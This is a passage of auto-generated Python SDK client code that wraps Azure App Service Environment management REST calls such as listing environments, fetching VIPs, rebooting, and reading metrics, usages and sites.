if response.status_code == 200:
deserialized = self._deserialize('StampCapacityCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_vips(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get IP addresses assigned to the hostingEnvironment (App Service
Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`AddressResponse
<azure.mgmt.web.models.AddressResponse>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/virtualip'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AddressResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environments(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""
Get all hostingEnvironments (App Service Environments) in a resource
group.
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`HostingEnvironmentCollection
<azure.mgmt.web.models.HostingEnvironmentCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('HostingEnvironmentCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def reboot_hosting_environment(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Reboots all machines in a hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/reboot'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [202, 400, 404, 409]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 202:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_operations(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
List all currently running operations on the hostingEnvironment (App
Service Environment)
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/operations'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_operation(
self, resource_group_name, name, operation_id, custom_headers=None, raw=False, **operation_config):
"""
Get status of an operation on a hostingEnvironment (App Service
Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param operation_id: operation identifier GUID
:type operation_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/operations/{operationId}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'operationId': self._serialize.url("operation_id", operation_id, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200, 202, 404, 500]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if response.status_code == 202:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_metrics(
self, resource_group_name, name, details=None, filter=None, custom_headers=None, raw=False, **operation_config):
"""
Get global metrics of hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param details: Include instance details
:type details: bool
:param filter: Return only usages/metrics specified in the filter.
Filter conforms to odata syntax. Example: $filter=(name.value eq
'Metric1' or name.value eq 'Metric2') and startTime eq
'2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
timeGrain eq duration'[Hour|Minute|Day]'.
:type filter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ResourceMetricCollection
<azure.mgmt.web.models.ResourceMetricCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/metrics'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if details is not None:
query_parameters['details'] = self._serialize.query("details", details, 'bool')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ResourceMetricCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_metric_definitions(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get global metric definitions of hostingEnvironment (App Service
Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`MetricDefinition
<azure.mgmt.web.models.MetricDefinition>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/metricdefinitions'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MetricDefinition', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_usages(
self, resource_group_name, name, filter=None, custom_headers=None, raw=False, **operation_config):
"""
Get global usages of hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param filter: Return only usages/metrics specified in the filter.
Filter conforms to odata syntax. Example: $filter=(name.value eq
'Metric1' or name.value eq 'Metric2') and startTime eq
'2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
timeGrain eq duration'[Hour|Minute|Day]'.
:type filter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CsmUsageQuotaCollection
<azure.mgmt.web.models.CsmUsageQuotaCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/usages'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CsmUsageQuotaCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_multi_role_metrics(
self, resource_group_name, name, start_time=None, end_time=None, time_grain=None, details=None, filter=None, custom_headers=None, raw=False, **operation_config):
"""
Get metrics for a multiRole pool of a hostingEnvironment (App Service
Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param start_time: Beginning time of metrics query
:type start_time: str
:param end_time: End time of metrics query
:type end_time: str
:param time_grain: Time granularity of metrics query
:type time_grain: str
:param details: Include instance details
:type details: bool
:param filter: Return only usages/metrics specified in the filter.
Filter conforms to odata syntax. Example: $filter=(name.value eq
'Metric1' or name.value eq 'Metric2') and startTime eq
'2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
timeGrain eq duration'[Hour|Minute|Day]'.
:type filter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ResourceMetricCollection
<azure.mgmt.web.models.ResourceMetricCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/metrics'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if start_time is not None:
query_parameters['startTime'] = self._serialize.query("start_time", start_time, 'str')
if end_time is not None:
query_parameters['endTime'] = self._serialize.query("end_time", end_time, 'str')
if time_grain is not None:
query_parameters['timeGrain'] = self._serialize.query("time_grain", time_grain, 'str')
if details is not None:
query_parameters['details'] = self._serialize.query("details", details, 'bool')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ResourceMetricCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_web_worker_metrics(
self, resource_group_name, name, worker_pool_name, details=None, filter=None, custom_headers=None, raw=False, **operation_config):
"""
Get metrics for a worker pool of a hostingEnvironment (App Service
Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param worker_pool_name: Name of worker pool
:type worker_pool_name: str
:param details: Include instance details
:type details: bool
:param filter: Return only usages/metrics specified in the filter.
Filter conforms to odata syntax. Example: $filter=(name.value eq
'Metric1' or name.value eq 'Metric2') and startTime eq
'2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
timeGrain eq duration'[Hour|Minute|Day]'.
:type filter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ResourceMetricCollection
<azure.mgmt.web.models.ResourceMetricCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/metrics'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if details is not None:
query_parameters['details'] = self._serialize.query("details", details, 'bool')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ResourceMetricCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_multi_role_metric_definitions(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get metric definitions for a multiRole pool of a hostingEnvironment
(App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`MetricDefinitionCollection
<azure.mgmt.web.models.MetricDefinitionCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/metricdefinitions'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MetricDefinitionCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_web_worker_metric_definitions(
self, resource_group_name, name, worker_pool_name, custom_headers=None, raw=False, **operation_config):
"""
Get metric definitions for a worker pool of a hostingEnvironment (App
Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param worker_pool_name: Name of worker pool
:type worker_pool_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`MetricDefinitionCollection
<azure.mgmt.web.models.MetricDefinitionCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/metricdefinitions'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MetricDefinitionCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_multi_role_usages(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Get usages for a multiRole pool of a hostingEnvironment (App Service
Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`UsageCollection
<azure.mgmt.web.models.UsageCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/usages'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('UsageCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_web_worker_usages(
self, resource_group_name, name, worker_pool_name, custom_headers=None, raw=False, **operation_config):
"""
Get usages for a worker pool of a hostingEnvironment (App Service
Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param worker_pool_name: Name of worker pool
:type worker_pool_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`UsageCollection
<azure.mgmt.web.models.UsageCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/usages'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('UsageCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_hosting_environment_sites(
self, resource_group_name, name, properties_to_include=None, custom_headers=None, raw=False, **operation_config):
"""
Get all sites on the hostingEnvironment (App Service Environment).
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param properties_to_include: Comma separated list of site properties
to include
:type properties_to_include: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`SiteCollection <azure.mgmt.web.models.SiteCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/sites'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
